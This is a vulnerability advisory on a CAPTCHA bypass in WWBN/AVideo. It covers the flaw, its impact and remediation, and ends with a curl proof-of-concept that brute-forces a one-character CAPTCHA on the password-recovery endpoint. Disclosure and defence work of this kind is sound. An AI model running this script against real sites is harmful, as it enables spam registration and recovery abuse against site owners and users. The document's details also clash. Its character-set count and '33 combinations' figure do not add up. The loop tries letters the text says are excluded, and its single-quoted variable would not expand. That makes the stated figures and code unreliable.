# Vulnerability Summary: WWBN/AVideo CAPTCHA Bypass ## Vulnerability Overview This vulnerability exists in the `WWBN/AVideo` project. An attacker can deterministically bypass the CAPTCHA by controlling the `ql` parameter (CAPTCHA length) of `getCaptcha.php` and exploiting the lack of token invalidation mechanism. It mainly involves three coordinated flaws: 1. **External control of CAPTCHA strength**: The `ql` parameter lacks minimum value restrictions or type checks, allowing an attacker to set it to 1, generating a single-character CAPTCHA. 2. **Small character set stored in session**: The CAPTCHA is generated only from 25 letters (A–Z excluding I, O, Q, U, V, W, X, Y, Z) and digits 2–9, without case distinction, resulting in extremely low entropy (approximately 33 possible combinations). 3. **Weak comparison and non-invalidated token**: The validation logic uses case-insensitive comparison, and the CAPTCHA token in the session is cleared only upon successful verification. If verification fails, the token remains, allowing unlimited retries within the same session. ## Impact Scope * **Affected versions**: `wwbn/avideo` <= 29.0 * **CVSS Score**: 5.3 / 10 (Moderate) * **Attack Vector**: Network * **Impact**: * Automated account creation / spam registration (`userCreate.json.php`) * User enumeration / password reset abuse (`userRecoverPass.json.php`) * Spam sending (`sendEmail.json.php`) * Comment / donation / wallet abuse (`donate.json.php`, `viewTransferFunds.json.php`) * **Exploitation conditions**: No authentication required; targets publicly exposed anonymous endpoints. ## Remediation 1. **Restrict parameter range**: Clamp the `ql` parameter in `objects/getCaptcha.php` to a safe server-side range (e.g., 5 to 9). 2. **Force token invalidation**: In the `validation` function of `objects/captcha.php`, always `unset` the CAPTCHA token in the session regardless of success or failure, ensuring each guess consumes a fresh token. 3. **Enhance randomness**: Use a CSPRNG (such as `random_int`) instead of `str_shuffle` to generate the CAPTCHA, preventing predictability. ## POC Code **Step 1: Obtain single-character CAPTCHA** ```bash curl -c jar -s 'https://target/objects/getCaptcha.php?ql=1' -o /dev/null ``` **Step 2: Brute-force single-character answer** ```bash for c in a b c d e f g h i j k l m n o p q r s t u v w x y z 2 3 4 5 6 7 8 9; do code=$(curl -b jar -s -o /tmp/r -w "%{http_code}" -X POST \ 'https://target/objects/userRecoverPass.php' \ --data-urlencode 'user=root' \ --data-urlencode 'recoverpass=1' \ --data-urlencode 'captcha=$c') if ! grep -q 'Your code is not valid' /tmp/r; then echo "HIT with captcha=$c"; break fi done ```